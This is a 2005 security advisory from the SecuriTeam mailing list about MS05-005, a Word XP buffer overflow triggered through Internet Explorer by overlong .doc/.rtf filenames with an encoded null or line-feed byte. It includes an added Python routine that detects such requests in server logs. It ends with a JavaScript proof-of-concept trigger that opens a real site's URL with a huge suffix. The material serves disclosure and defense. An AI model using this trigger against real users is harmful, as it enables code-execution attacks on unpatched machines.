[NT] Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)
From: SecuriTeam (support_at_securiteam.com)
Date: 02/13/05
To: list@securiteam.com Date: 13 Feb 2005 11:08:27 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)
------------------------------------------------------------------------
SUMMARY
A vulnerability in Microsoft Word XP allows an attacker to trigger a buffer
overflow. The attack can occur when a user opens a Word document using
Internet Explorer.
DETAILS
When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP
"takes over" and opens that doc file. The problem appears when a doc file
request contains a URL-encoded null byte (%00) at the end of the doc
filename, followed by further characters (the .rtf extension is also
vulnerable).
For example, http://example.com/myfile.doc is a valid request, whereas
http://example.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc is an
invalid request. Such a request is nonetheless sent to the server hosting
the doc file.
Most servers, such as IIS and Apache, truncate the filename at the %00 when
serving the file to Internet Explorer. Internet Explorer, however, hands the
full untruncated string to Microsoft Word XP, which therefore receives a
very long filename. This string causes an exploitable buffer overflow,
allowing remote code execution.
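The server-side truncation described above leaves a visible trace: the web server or proxy still logs the raw request line with the encoded %00 (or %0a, as in the proof of concept below) and the long suffix. The following detection routine is an added example, not part of the advisory; it assumes Apache/IIS-style common log lines, and the sample log lines and the LONG_TAIL threshold are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions the advisory says Internet Explorer hands off to Word XP.
HANDOFF_EXTS = r"doc|rtf"
# Constructed threshold: a suffix longer than this after the truncating byte is
# reported as a likely overflow attempt rather than a stray encoded character.
LONG_TAIL = 200

# ".doc"/".rtf" followed directly by an encoded NUL (%00) or LF (%0a). The raw,
# still percent-encoded path is inspected so the %00 remains visible.
_TRUNC_RE = re.compile(r"(?i)\.(%s)(%%00|%%0a)" % HANDOFF_EXTS)
# Common log format: client - - [timestamp] "METHOD target PROTO" status bytes
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

def check_url(url):
    """Return a finding dict if %00/%0a follows .doc/.rtf in the path, else None."""
    path = urlsplit(url).path
    m = _TRUNC_RE.search(path)
    if m is None:
        return None
    tail = unquote(path[m.end():])  # what Word would receive beyond the server's cut
    return {
        "ext": m.group(1).lower(),
        "trunc": m.group(2).lower(),
        "tail_len": len(tail),
        "long_tail": len(tail) > LONG_TAIL,
    }

def scan_log(text):
    """Run check_url over every request line; one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if m is None:
            continue
        finding = check_url(m.group(3))
        if finding is not None:
            finding["client"] = m.group(1)
            findings.append(finding)
    return findings

# Constructed sample log (not from the advisory): a benign request, a
# %00-truncated .doc request, and a %0a-truncated .rtf request with a long suffix.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [13/Feb/2005:11:08:27 +0200] "GET /myfile.doc HTTP/1.1" 200 12345',
    '10.0.0.7 - - [13/Feb/2005:11:09:01 +0200] "GET /myfile.doc%%00%s.doc HTTP/1.1" 200 12345' % ("a" * 40),
    '10.0.0.9 - - [13/Feb/2005:11:09:30 +0200] "GET /report.rtf%%0a%s HTTP/1.1" 404 0' % ("b" * 300),
])
```

Running `scan_log(SAMPLE_LOG)` reports the second and third lines; the benign first line produces no finding.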
Proof of Concept Code:
<script>
// Build a long filename suffix and open a URL whose .rtf name is followed by
// an encoded control character (%0a) and that suffix; the server truncates
// the name, but Internet Explorer passes the full string to Word XP.
var mylongstring, myjunk, c;
mylongstring = "";
myjunk = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
for (c = 1; c < 5000; c++)
{
  mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a" + mylongstring);
</script>
Vendor Status:
Microsoft was notified on July 13, 2004.
Microsoft has released an advisory and patches for this vulnerability. For
further details please refer to:
<http://www.microsoft.com/technet/security/bulletin/ms05-005.mspx>
Vulnerability in Microsoft Office XP Could Allow Remote Code Execution
(MS05-005)
ADDITIONAL INFORMATION
The information has been provided by <mailto:rivgi@finjan.com> Rafel Ivgi.